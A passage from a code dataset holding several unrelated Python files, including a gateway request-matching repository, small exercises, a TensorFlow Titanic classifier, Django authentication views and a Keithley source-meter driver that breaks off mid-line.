JSON gateway objects.\n \n def __init__(self):\n assert isinstance(self.uri, str), 'Invalid URI %s' % self.uri\n assert isinstance(self.cleanupInterval, int), 'Invalid cleanup interval %s' % self.cleanupInterval\n assert isinstance(self.requesterGetJSON, RequesterGetJSON), 'Invalid requester JSON %s' % self.requesterGetJSON\n super().__init__()\n self.initialize()\n\n def process(self, chain, request:Request, response:Response, Gateway:GatewayRepository, Match:MatchRepository, **keyargs):\n '''\n @see: HandlerProcessor.process\n \n Obtains the repository.\n '''\n assert isinstance(request, Request), 'Invalid request %s' % request\n assert isinstance(response, Response), 'Invalid response %s' % response\n assert issubclass(Gateway, GatewayRepository), 'Invalid gateway class %s' % Gateway\n assert issubclass(Match, MatchRepository), 'Invalid match class %s' % Match\n \n if self._identifiers is None:\n jobj, error = self.requesterGetJSON.request(self.uri, details=True)\n if jobj is None:\n BAD_GATEWAY.set(response)\n response.text = error.text\n return\n assert 'GatewayList' in jobj, 'Invalid objects %s, not GatewayList' % jobj\n self._identifiers = [self.populate(Identifier(Gateway()), obj) for obj in jobj['GatewayList']]\n \n repository = Repository(request.clientIP, self._identifiers, Match)\n if request.repository: request.repository = RepositoryJoined(request.repository, repository)\n else: request.repository = repository\n\n # ----------------------------------------------------------------\n \n def initialize(self):\n '''\n Initialize the repository.\n '''\n self._identifiers = None\n self.startCleanupThread('Cleanup gateways thread')\n \n def startCleanupThread(self, name):\n '''\n Starts the cleanup thread.\n \n @param name: 
string\n The name for the thread.\n '''\n schedule = scheduler(time.time, time.sleep)\n def executeCleanup():\n self.performCleanup()\n schedule.enter(self.cleanupInterval, 1, executeCleanup, ())\n schedule.enter(self.cleanupInterval, 1, executeCleanup, ())\n scheduleRunner = Thread(name=name, target=schedule.run)\n scheduleRunner.daemon = True\n scheduleRunner.start()\n\n def performCleanup(self):\n '''\n Performs the cleanup for gateways.\n '''\n self._identifiers = None\n \n # ----------------------------------------------------------------\n \n def populate(self, identifier, obj):\n '''\n Populates the gateway based on the provided dictionary object.\n @see: gateway-http/gateway.http.gateway\n \n @param identifier: Identifier\n The identifier object to populate.\n @param obj: dictionary{string: string|list[string]}\n The dictionary used for defining the gateway object, the object as is defined from response.\n @return: Identifier\n The populated identifier object.\n '''\n assert isinstance(identifier, Identifier), 'Invalid identifier %s' % identifier\n assert isinstance(obj, dict), 'Invalid object %s' % obj\n \n clients = obj.get('Clients')\n if clients:\n assert isinstance(clients, list), 'Invalid clients %s' % clients\n if __debug__:\n for client in clients: assert isinstance(client, str), 'Invalid client value %s' % client\n identifier.clients.extend(re.compile(client) for client in clients)\n \n pattern = obj.get('Pattern')\n if pattern:\n assert isinstance(pattern, str), 'Invalid pattern %s' % pattern\n identifier.pattern = re.compile(pattern)\n \n headers = obj.get('Headers')\n if headers:\n assert isinstance(headers, list), 'Invalid headers %s' % headers\n if __debug__:\n for header in headers: assert isinstance(header, str), 'Invalid header value %s' % header\n identifier.headers.extend(re.compile(header) for header in headers)\n \n methods = obj.get('Methods')\n if methods:\n assert isinstance(methods, list), 'Invalid methods %s' % methods\n if __debug__:\n for method in methods: assert isinstance(method, str), 'Invalid method value %s' % method\n identifier.methods.update(method.upper() for method in methods)\n \n errors = obj.get('Errors')\n if errors:\n assert isinstance(errors, list), 'Invalid errors %s' % errors\n for error in errors:\n try: identifier.errors.add(int(error))\n except ValueError: raise ValueError('Invalid error value \\'%s\\'' % error)\n \n gateway = identifier.gateway\n assert isinstance(gateway, GatewayRepository), 'Invalid gateway %s' % gateway\n \n filters = obj.get('Filters')\n if filters:\n assert isinstance(filters, list), 'Invalid filters %s' % filters\n gateway.filters = {}\n for item in filters:\n assert isinstance(item, str), 'Invalid filter value %s' % item\n assert ':' in item, 'Invalid filter item %s, has no group specified' % item\n group, path = item.split(':', 1)\n try: group = int(group)\n except ValueError: raise ValueError('Invalid group value \\'%s\\'' % group)\n paths = gateway.filters.get(group)\n if paths is None: paths = gateway.filters[group] = []\n paths.append(path)\n \n# gateway.host = obj.get('Host')\n# assert not gateway.host or isinstance(gateway.host, str), 'Invalid host %s' % gateway.host\n# \n# gateway.protocol = obj.get('Protocol')\n# assert not gateway.protocol or isinstance(gateway.protocol, str), 'Invalid protocol %s' % gateway.protocol\n \n gateway.navigate = obj.get('Navigate')\n assert not gateway.navigate or isinstance(gateway.navigate, str), 'Invalid navigate %s' % gateway.navigate\n \n gateway.putHeaders = 
obj.get('PutHeaders')\n assert not gateway.putHeaders or isinstance(gateway.putHeaders, dict), 'Invalid put headers %s' % gateway.putHeaders\n \n return identifier\n \n# --------------------------------------------------------------------\n\nclass Identifier:\n '''\n Class that maps the gateway identifier.\n '''\n __slots__ = ('gateway', 'clients', 'pattern', 'headers', 'errors', 'methods')\n \n def __init__(self, gateway):\n '''\n Construct the identifier for the provided gateway.\n \n @param gateway: GatewayRepository\n The gateway for the identifier.\n '''\n assert isinstance(gateway, GatewayRepository), 'Invalid gateway %s' % gateway\n self.gateway = gateway\n \n self.clients = []\n self.pattern = None\n self.headers = []\n self.errors = set()\n self.methods = set()\n\nclass Repository(IRepository):\n '''\n The gateways repository.\n '''\n __slots__ = ('_clientIP', '_identifiers', '_Match')\n \n def __init__(self, clientIP, identifiers, Match):\n '''\n Construct the gateways repository based on the provided dictionary object.\n \n @param identifiers: list[Identifier]\n The identifiers to be used by the repository.\n '''\n assert clientIP is None or isinstance(clientIP, str), 'Invalid client IP %s' % clientIP\n assert isinstance(identifiers, list), 'Invalid identifiers %s' % identifiers\n assert issubclass(Match, MatchRepository), 'Invalid match class %s' % Match\n \n self._clientIP = clientIP\n self._identifiers = identifiers\n self._Match = Match\n \n def find(self, method=None, headers=None, uri=None, error=None):\n '''\n @see: IRepository.find\n '''\n for identifier in self._identifiers:\n assert isinstance(identifier, Identifier), 'Invalid identifier %s' % identifier\n \n if identifier.clients and self._clientIP is not None:\n for client in identifier.clients:\n if client.match(self._clientIP): break\n else: return\n \n groupsURI = self._macth(identifier, method, headers, uri, error)\n if groupsURI is not None: return self._Match(gateway=identifier.gateway, groupsURI=groupsURI)\n \n def allowsFor(self, headers=None, uri=None):\n '''\n @see: IRepository.allowsFor\n '''\n allowed = set()\n for identifier in self._identifiers:\n assert isinstance(identifier, Identifier), 'Invalid identifier %s' % identifier\n groupsURI = self._macth(identifier, None, headers, uri, None)\n if groupsURI is not None: allowed.update(identifier.methods)\n # We need to remove auxiliar methods\n allowed.discard(HTTP_OPTIONS)\n return allowed\n\n # ----------------------------------------------------------------\n \n def _macth(self, identifier, method, headers, uri, error):\n '''\n Checks the match for the provided identifier and parameters.\n \n @return: tuple(string)|None\n The URI match groups, None if there is no match.\n '''\n assert isinstance(identifier, Identifier)\n groupsURI = ()\n \n if method is not None:\n assert isinstance(method, str), 'Invalid method %s' % method\n if identifier.methods:\n if method.upper() not in identifier.methods: return\n \n if headers is not None:\n assert isinstance(headers, dict), 'Invalid headers %s' % uri\n isOk = False\n if identifier.headers:\n for nameValue in headers.items():\n header = '%s:%s' % nameValue\n for pattern in identifier.headers:\n if pattern.match(header):\n isOk = True\n break\n if isOk: break\n if not isOk: return\n elif identifier.headers: return\n \n if uri is not None:\n assert isinstance(uri, str), 'Invalid URI %s' % uri\n if identifier.pattern:\n matcher = identifier.pattern.match(uri)\n if matcher: groupsURI = matcher.groups()\n else: 
return\n elif identifier.pattern: return\n \n if error is not None:\n assert isinstance(error, int), 'Invalid error %s' % error\n if identifier.errors:\n if error not in identifier.errors: return\n else: return\n elif identifier.errors: return\n \n return groupsURI\n","sub_path":"components/service-gateway/ally/gateway/http/impl/processor/respository.py","file_name":"respository.py","file_ext":"py","file_size_in_byte":14823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553721070","text":"#50\nimport math\ndziesietna = int(input(\"Podaj dowolną liczbę dziesiętną: \"))\nst = str(dziesietna)+\"(10)=\"\ns = \"\"\nwork = True\n\nwhile work:\n if(dziesietna == 1):\n work = False\n s = s+\"1\"\n else:\n \n if dziesietna%2 == 0:\n s = s+\"0\"\n dziesietna = dziesietna/2\n else:\n s = s+\"1\"\n dziesietna = math.floor(dziesietna/2)\ns = s[len(s)::-1]\nst = st+s+\"(2)\"\nprint(st)\n\n\n# s = s +str(dziesietna%2)\n# dziesietna = math.floor(dziesietna/2)\n# if dziesietna == 1:\n# work = False\n \n#s = s+\"1\"\n","sub_path":"02-ControlStructures/zadanie50.py","file_name":"zadanie50.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387579345","text":"#!/usr/bin/python3\n''' script lists all state objects with name passed\n as argument from database hbtn_0e_6_usa\n'''\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\n\nif __name__ == '__main__':\n\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n session_m = sessionmaker(bind=engine)\n session = session_m()\n stateID = session.query(State).filter_by(name=sys.argv[4]).first()\n if stateID:\n print(stateID.id)\n else:\n print(\"Not found\")\n session.close()\n","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"618126098","text":"import math\nimport random\n\n\ndef get_onsphere_point(r):\n theta = random.uniform(0, math.pi*2)\n u = random.uniform(-1., 1.)\n a = math.sqrt(1. 
- u*u)\n\n point = (\n r * math.cos(theta) * a,\n r * math.sin(theta) * a,\n r * u\n )\n\n return point\n\n\ndef get_sphere_points_population(n, r):\n for i in range(n):\n yield get_onsphere_point(r)\n\n\nif __name__ == '__main__':\n n = 1500\n r = 4000\n points = list(get_sphere_points_population(n, r))\n","sub_path":"math/points_on_sphere_distr/random_sphere.py","file_name":"random_sphere.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"530355318","text":"import math\n\n\n# function for finding roots\ndef getX(a, b, c):\n\n # calculating discriminant using formula\n dis = b * b - 4 * a * c\n sqrt_val = math.sqrt(abs(dis))\n\n # find the values of X\n ans1 = ((-b + sqrt_val)/(2 * a))\n ans2 = ((-b - sqrt_val)/(2 * a))\n\n # returning the larger value\n if ans1 > ans2:\n return print(ans1)\n else:\n return print(ans2)\n\n\n# getting input\n# getting rid of ValueError\ntry:\n a = int(input('Input a: '))\n b = int(input('Input b: '))\n c = int(input('Input c: '))\nexcept ValueError:\n print(\"Invalid input\")\n\n# calling the function\ntry:\n if a == 0:\n print(\"Input correct quadratic equation\")\n else:\n getX(a, b, c)\nexcept NameError:\n print(\"Invalid input\")\n","sub_path":"kevogaba.py","file_name":"kevogaba.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"128512603","text":"\ndef run(env, agent):\n \"\"\"\n Analyze the behavior of your trained policies using the environment and agent from your RL\n experiment. The environment is likely wrapped by the MultiAgentWrapper; you\n can use the unwrapped property to get the Simulation Manager.\n \"\"\"\n\n env = env.unwrapped\n\n # Run the simulation with actions chosen from the trained policies\n policy_agent_mapping = agent.config['multiagent']['policy_mapping_fn']\n # for episode in range(num_episodes):\n for episode in range(100):\n print('Episode: {}'.format(episode))\n obs = env.reset()\n while True: # Run until the episode ends\n # Get actions from policies\n joint_action = {}\n for agent_id, agent_obs in obs.items():\n policy_id = policy_agent_mapping(agent_id)\n action = agent.compute_action(agent_obs, policy_id=policy_id)\n joint_action[agent_id] = action\n # Step the environment\n obs, reward, done, info = env.step(joint_action)\n if done['__all__']:\n break\n","sub_path":"examples/analysis_prototype.py","file_name":"analysis_prototype.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"179900656","text":"import json, os\nfrom solcx import compile_source\n\n\ncontract = os.path.join(os.getcwd(), '..', '..', 'Contract', 'KYCWallet_Contract_UPDATED.sol')\n\nwith open(contract, 'r') as f:\n source = f.read()\n\ncompiled_contract = compile_source(source)\n\nfactory_filepath = os.path.join(os.getcwd(), 'walletFactory')\nwallet_filepath = os.path.join(os.getcwd(), 'walletContract')\n\nwith open(factory_filepath, 'w') as f:\n json.dump(compiled_contract[':WalletFactory'], f)\n\nwith open(wallet_filepath, 'w') as w:\n json.dump(compiled_contract[':KYC_Wallet'], w)","sub_path":"KYC_WalletApp/w3/compile_contract.py","file_name":"compile_contract.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"251445719","text":"from django.shortcuts import render, 
HttpResponseRedirect\nfrom authapp.forms import ShopUserLoginForm, ShopUserRegisterForm, ShopUserEditForm, ShopUserProfileEditForm\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom basketapp.models import Basket\nfrom mainapp.models import Category\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom authapp.models import ShopUser\nfrom django.db import transaction\n\n\n\ndef login(request):\n\n next = request.GET['next'] if 'next' in request.GET.keys() else ''\n\n if request.method == 'POST':\n\n login_form = ShopUserLoginForm(data=request.POST)\n if login_form.is_valid():\n username = request.POST['username']\n password = request.POST['password']\n\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n if 'next' in request.POST.keys():\n return HttpResponseRedirect(request.POST['next'])\n else:\n return HttpResponseRedirect(reverse('mainapp:main'))\n else:\n login_form = ShopUserLoginForm()\n\n content = {\n 'login_form': login_form,\n 'next': next\n }\n\n return render(request, 'login.html', content)\n\ndef login_after_registration(request):\n return render(request, 'login_a_r.html')\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(reverse('mainapp:main'))\n\n\ndef register(request):\n\n if request.method == 'POST':\n register_form = ShopUserRegisterForm(request.POST, request.FILES)\n\n if register_form.is_valid():\n user = register_form.save()\n if send_verify_mail(user):\n print('сообщение подтверждения отправлено')\n return HttpResponseRedirect(reverse('authapp:login_a_r'))\n else:\n print('ошибка отправки сообщения')\n return HttpResponseRedirect(reverse('authapp:login'))\n else:\n register_form = ShopUserRegisterForm()\n\n content = {\n 'register_form': register_form,\n }\n\n return render(request, 'register.html', content)\n\n# @login_required\n# def edit(request):\n# basket = []\n# if request.user.is_authenticated:\n# basket = Basket.objects.filter(user=request.user)\n# if request.method == 'POST':\n# edit_form = ShopUserEditForm(request.POST, request.FILES, instance=request.user)\n# if edit_form.is_valid():\n# edit_form.save()\n# return HttpResponseRedirect(reverse('auth:edit'))\n# else:\n# edit_form = ShopUserEditForm(instance=request.user)\n#\n# content = {\n# 'edit_form': edit_form,\n# 'basket': basket,\n# 'categories': categories\n# }\n#\n# return render(request, 'edit.html', content)\n\n\ndef send_verify_mail(user):\n verify_link = reverse('auth:verify', args=[user.pk, user.activation_key])\n\n title = 'Подтверждение учетной записи {}'.format(user.username)\n\n message = 'Для подтверждения учетной записи {} на портале \\\n{} перейдите по ссылке: \\n{}{}'.format(user.username, settings.DOMAIN_NAME, settings.DOMAIN_NAME, verify_link)\n\n return send_mail(title, message, settings.EMAIL_HOST_USER, [user.email], fail_silently=False)\n\n\ndef verify(request, pk, activation_key):\n try:\n user = ShopUser.objects.get(pk=pk)\n if user.activation_key == activation_key and not user.is_activation_key_expired():\n user.is_active = True\n user.save()\n auth.login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n return render(request, 'verification.html')\n else:\n print('error activation user: {}'.format(user))\n return render(request, 'verification.html')\n except Exception as e:\n print('error activation user : {}'.format(e.args))\n return 
HttpResponseRedirect(reverse('authapp:login'))\n\n\n@transaction.atomic\n@login_required\ndef edit(request):\n\n if request.method == 'POST':\n edit_form = ShopUserEditForm(request.POST, request.FILES, instance=request.user)\n profile_form = ShopUserProfileEditForm(request.POST, instance=request.user.shopuserprofile)\n if edit_form.is_valid() and profile_form.is_valid():\n edit_form.save()\n return HttpResponseRedirect(reverse('auth:edit'))\n else:\n edit_form = ShopUserEditForm(instance=request.user)\n profile_form = ShopUserProfileEditForm(\n instance=request.user.shopuserprofile\n )\n\n content = {\n 'edit_form': edit_form,\n 'profile_form': profile_form\n }\n return render(request, 'edit.html', content)","sub_path":"authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441970195","text":"import codecs, re, random\nfrom collections import Counter\nimport numpy as np\nfrom separator import Separator\nfrom konlpy.tag import Mecab\n\n# indexes sentences by vocab frequency list\n# reserves 0 for UNKs\n# todo: probably shoulda used sklearn.####vectorizer\n\n# USAGE\n# first get lists like this:\n# sents, classes = dataset.get_lists(sents_filename, classes_filename)\n# then run train-test split like this:\n# train_X, train_y, test_X, test_y, test_set, class_set = \\\n# dataset.get_test_train(sents, classes, trainsize=0.8, max_vocab=50000):\n\n# function to get lists from data\n# takes corpus as filename (headlines, articles on alternate lines)\n# returns lists of sentence token lists, classes\ndef get_lists(file_corpus, testing=0):\n if testing == 1:\n print('starting dataset.get_lists()...')\n f_corpus = codecs.open(file_corpus, 'rb', encoding='utf8')\n sents = []\n heads = []\n counter = 0\n\n for line in f_corpus:\n if counter % 2 == 0:\n heads.append(line.strip('\\n').split(' '))\n else:\n sents.append(line.strip('\\n').split(' '))\n counter += 1\n return(sents, heads)\n\n\ndef get_texts(file_corpus, testing=0):\n if testing == 1:\n print('starting dataset.get_lists()...')\n f_corpus = codecs.open(file_corpus, 'rb', encoding='utf8')\n sents = []\n heads = []\n counter = 0\n\n for line in f_corpus:\n if counter % 2 == 0:\n heads.append(line.strip('\\n'))\n else:\n sents.append(line.strip('\\n'))\n counter += 1\n return(sents, heads)\n\n\n# function to get vocab, maxvocab\n# takes list : sents\ndef get_vocab(sents, heads, testing=0):\n if testing == 1:\n print('starting dataset.get_vocab()...')\n # get vocab list\n vocab = []\n for sent in sents:\n for word in sent:\n vocab.append(word)\n for sent in heads:\n for word in sent:\n vocab.append(word)\n\n counts = Counter(vocab) # get counts of each word\n vocab_set = list(set(vocab)) # get unique vocab list\n sorted_vocab = sorted(vocab_set, key=lambda x: -counts[x]) # sort by counts\n\n if testing==1:\n print(\"get_vocab[:10]:\", sorted_vocab[:10])\n\n return(sorted_vocab)\n\n\n# function to convert sents to vectors\n# takes list : sents, int : max vocab\n# returns list of vectors (as lists)\ndef index_sents(sents, vocab, max_vocab, testing=0):\n if testing==1:\n print(\"starting vectorize_sents()...\")\n # get sorted vocab\n vectors = []\n # iterate thru sents\n for sent in sents:\n sent_vect = []\n sentlist = sent.split(' ')\n for word in sentlist:\n if word in vocab.keys():\n idx = vocab[word] + 1 # reserve 0 for UNK / OOV\n if idx < max_vocab: # in max_vocab range\n sent_vect.append(idx)\n else: # out of 
max_vocab range or OOV\n sent_vect.append(0)\n vectors.append(sent_vect)\n return(vectors)\n\n\ndef onehot_vectorize_sents(sents, vocab, max_vocab, testing=0):\n if testing==1:\n print(\"starting vectorize_sents()...\")\n # get sorted vocab\n vectors = []\n # iterate thru sents\n for sent in sents:\n sent_vect = []\n for word in sent:\n one_hot = []\n idx = vocab.index(word) + 1 # reserve 0 for UNK / OOV\n for i in range(max_vocab+1):\n if i == idx: # matching\n one_hot.append(1)\n else:\n one_hot.append(0)\n sent_vect.append(one_hot)\n vectors.append(sent_vect)\n if testing==1:\n print(\"onehot_vectorize_sents[:10]:\", vectors[0])\n return(vectors)\n\n\n# function to return lists of graphemes\n# takes sentence as string\n# returns list of graphemes\ndef grapheme_splitter(sent):\n sentlist = sent.strip().split(' ')\n graphlist = []\n for word in sentlist:\n wordlist = list(word)\n for syllable in wordlist:\n # find korean words\n if re.findall(r'[[\\uac00-\\ud7a3]|[\\u1100-\\u11ff]]+', syllable):\n graphlist += Separator(syllable).sep_all\n else:\n graphlist.append(syllable)\n return graphlist\n\n\n# function to return lexicalized morphs from mecab\n# takes sentence as string\n# returns space-separated string of lexicalized morphemes\ndef mecab_tokenize(sent):\n\n\n return\n\ndef kkma_tokenize(sents):\n from konlpy.tag import Kkma\n kkma = Kkma()\n lex_sents = []\n # POS-tag and get lexical form from morphemes using KONLPY\n for sent in sents:\n lex_sents.append(' '.join(kkma.morphs(sent)))\n if len(lex_sents) % 200 == 0:\n print(\"kkma: done\", len(lex_sents), \"of\", len(sents), \"total\")\n return lex_sents","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"311723340","text":"from QlernNN_WangJingyan.q_learning_nn import *\nimport numpy as np\nimport sys\n\ndef random_agent(env, num_episodes, max_steps_per_episode=500):\n \n stats = EpisodeStats(\n episode_lengths=np.zeros(num_episodes),\n episode_rewards=np.zeros(num_episodes)) \n \n for i_episode in range(num_episodes):\n sys.stdout.flush()\n state = env.reset()\n\n for t in range(max_steps_per_episode):\n next_state, reward, done, _ = env.step(action=np.random.choice(env.action_space.n))\n\n stats.episode_rewards[i_episode] += reward\n stats.episode_lengths[i_episode] = t+1\n\n if done :\n print(\"\\repisode:{}/{} score:{}\".format(i_episode, num_episodes, t+1), end=\"\")\n break\n \n state = next_state \n\n return stats\n\n","sub_path":"RandomAgent_WangJingyan/random_agent.py","file_name":"random_agent.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"293428140","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom utils.evaluator import *\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport os\n\n\ndef preprocessing(dfdata):\n dfresult = pd.DataFrame()\n\n #Pclass\n dfPclass = pd.get_dummies(dfdata['Pclass'])\n dfPclass.columns = ['Pclass' + str(x) for x in dfPclass.columns]\n dfresult = pd.concat([dfresult, dfPclass], axis=1)\n\n #Sex\n dfSex = pd.get_dummies(dfdata['Sex'])\n dfresult = pd.concat([dfresult, dfSex], axis=1)\n\n #age\n dfresult['Age'] = dfdata['Age'].fillna(0)\n dfresult['Age_null'] = pd.isna(dfdata['Age']).astype('int32')\n\n #SibSp, Parch, Fare\n dfresult['SibSp'] = dfdata['SibSp']\n dfresult['Parch'] = dfdata['Parch']\n dfresult['Fare'] = 
dfdata['Fare']\n\n #Cabin\n dfresult['Cabin_null'] = pd.isna(dfdata['Cabin']).astype('int32')\n\n #Embarked\n dfEmbarked = pd.get_dummies(dfdata['Embarked'], dummy_na=True)\n dfEmbarked.columns = ['Embarked_' + str(x) for x in dfEmbarked.columns]\n dfresult = pd.concat([dfresult, dfEmbarked], axis=1)\n\n return dfresult.values\n\n\ndef build_graph(input_dim):\n def weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n def bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n def fc(in_shape, out_shape, input, name_space):\n with tf.name_scope(name_space):\n w_fc = weight_variable([in_shape, out_shape])\n b_fc = bias_variable([out_shape])\n output_fc = tf.matmul(input, w_fc) + b_fc\n return output_fc\n\n x = tf.placeholder(tf.float32, [None, input_dim], name='x-input')\n y_ = tf.placeholder(tf.int64, [None, ], name='y-input')\n y_onehot_ = tf.placeholder(tf.float32, [None, 2], name='y-onehot')\n\n out_fc1 = tf.nn.relu(fc(input_dim, 100, x, 'fc1'))\n out_fc2 = tf.nn.relu(fc(100, 20, out_fc1, 'fc2'))\n out_fc3 = tf.nn.relu(fc(20, 20, out_fc2, 'fc2.1'))\n out_fc4 = tf.nn.relu(fc(20, 20, out_fc3, 'fc2.2'))\n\n # y = tf.nn.softmax(fc(10, 2, out_fc2, 'fc3'), name='softmax-output')\n y = fc(20, 2, out_fc4, 'fc3')\n\n pred = tf.argmax(y, 1, name='pred')\n\n # loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=y_))\n # loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=y, labels=y_onehot_))\n loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(logits=y, labels=y_onehot_, pos_weight=5.0))\n\n\n\n opt = tf.train.AdamOptimizer(lr).minimize(loss)\n\n correct_prediction = tf.equal(pred, y_)\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n return {'x_input': x, 'y_input': y_, 'y_onehot': y_onehot_, 'softmax-output': y, 'pred': pred, 'loss': loss,\n 'optimization': opt, 'accuracy': accuracy}\n\n\nbz = 64\nlr = 0.01\nepochs = 30\n\nif __name__ == '__main__':\n\n dftrain_raw = pd.read_csv('../data/unbalanced/train.csv')\n dftest_raw = pd.read_csv('../data/unbalanced/test.csv')\n x_train = preprocessing(dftrain_raw)\n x_test = preprocessing(dftest_raw)\n y_train = dftrain_raw['Survived'].values\n y_test = dftest_raw['Survived'].values\n train_size = x_train.shape[0]\n dataset_train = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n dataset_train = dataset_train.batch(bz)\n iterator = dataset_train.make_initializable_iterator()\n features, labels = iterator.get_next()\n\n graph = build_graph(15)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n sess.run(iterator.initializer)\n i = 0\n while 1:\n feature, label = sess.run([features, labels])\n print(label.shape)\n label_onehot = OneHotEncoder(sparse=False).fit_transform(label.reshape(-1, 1))\n _, acc, loss = sess.run([graph['optimization'], graph['accuracy'], graph['loss']],\n feed_dict={graph['x_input']: feature, graph['y_input']: label, graph['y_onehot']: label_onehot})\n print(\"epoch [{:>2}/{}], iter [{:>2}/{}], loss {:.4f}, accuracy {:.4f}\".\n format(epoch, epochs, i, train_size // bz, loss, acc))\n i += 1\n if i % (train_size // bz) == 0 and i > 0:\n break\n\n y_test_onehot = OneHotEncoder(sparse=False).fit_transform(y_test.reshape(-1, 1))\n y_pred, acc_test = sess.run([graph['pred'], graph['accuracy']], feed_dict={graph['x_input']: x_test, graph['y_input']: y_test, graph['y_onehot']: label_onehot})\n 
print(\"test accuracy: {:.4f}\".format(acc_test))\n\n # for i in range(10):\n # f, l = sess.run([features, labels])\n # print(i, l)\n # i += 1\n # if i % (train_size // bz) == 0 and i > 0:\n # sess.run(iterator.initializer)\n print(y_pred)\n perf_evaluate(y_test, y_pred)","sub_path":"supervisor-learning/unbalanced_data.py","file_name":"unbalanced_data.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215831659","text":"import logging\nlog = logging.getLogger(__name__)\n\nfrom spacq.interface.resources import Resource\nfrom spacq.tool.box import Synchronized\n\nfrom ..abstract_device import AbstractDevice\nfrom ..tools import quantity_wrapped\nfrom ..tools import quantity_unwrapped\n\n\"\"\"\nKeithley 2401 SourceMeasure Unit\nApply voltage/current bias and obtain measurements.\n\"\"\"\n\n\nclass sm2401(AbstractDevice):\n\t\"\"\"\n\tInterface for Keithley 2401\n\tNote: Limited implementation, many features are not included\n\t\"\"\"\n\n\t#allowedSourceType = set(['Voltage','Current'])\n\t#allowedSenseType = set(['Voltage','Current'])\n\tallowedOutput = set(['on','off'])\n\n\tdef _setup(self):\n\t\tAbstractDevice._setup(self)\n\n\t\t# Resources.\n\t\tread_only = ['voltageIn', 'currentIn']\n\t\tfor name in read_only:\n\t\t\tself.resources[name] = Resource(self, name)\n\n\t\t#read_write = ['voltageOut', 'currentOut','sourceType','senseType']\n\t\tread_write = ['voltageOut', 'currentOut','output']\n\t\tfor name in read_write:\n\t\t\tself.resources[name] = Resource(self, name, name)\n\n\t\tself.resources['voltageIn'].units = 'V'\n\t\tself.resources['voltageOut'].units = 'V'\n\t\tself.resources['currentIn'].units = 'A'\n\t\tself.resources['currentOut'].units = 'A'\n\t\tself.resources['output'].allowed_values = self.allowedOutput\n\t\tself.currOutputState = -1\n\t\tself.currentOutputCurrent = -88\n\t\tself.currentOutputVoltage = -88\n\t\t#self.resources['sourceType'].allowed_values = self.allowedSourceType\n\t\t#self.resources['senseType'].allowed_values = self.allowedSenseType\n\t\t\n\t@Synchronized()\n\tdef _connected(self):\n\t\tAbstractDevice._connected(self)\n\n\t\t#self.write('configure:voltage:dc')\n\t\t# TODO: Create a default setup?\n\n\t\t# Get output on/off state to determine if we can ask certain things\n\t\tself.currOutputState = int(self.ask('OUTP?'))\n\t\n\t@Synchronized()\n\tdef reset(self):\n\t\t\"\"\"\n\t\tReset the device to its default state.\n\t\t\"\"\"\n\n\t\tlog.info('Resetting \"{0}\".'.format(self.name))\n\t\tself.write('*rst')\n\n\t@property\n\tdef output(self):\n\t\t# Coded setting of the output on/off (1 = on, 0 = off)\n\t\tresult = self.ask('OUTP?')\n\t\tif result == '0':\n\t\t\tself.currOutputState = 0\n\t\t\treturn 'off'\n\t\telif result == '1':\n\t\t\tself.currOutputState = 1\n\t\t\treturn 'on'\n\t\t\n\t@output.setter\n\tdef output(self,value):\n\t\tif value not in self.allowedOutput:\n\t\t\traise ValueError('Invalid Output State: {0}'.format(value))\n\t\t\n\t\tif value == 'off':\n\t\t\toutCode = 0\n\t\t\tself.currOutputState = 0\n\t\telif value == 'on':\n\t\t\toutCode = 1\n\t\t\tself.currOutputState = 1\n\n\t\tself.write('OUTP {0}'.format(outCode))\n\n\t@property\n\t@quantity_wrapped('V')\n\tdef voltageIn(self):\n\t\tif self.currOutputState:\n\t\t\toutString = 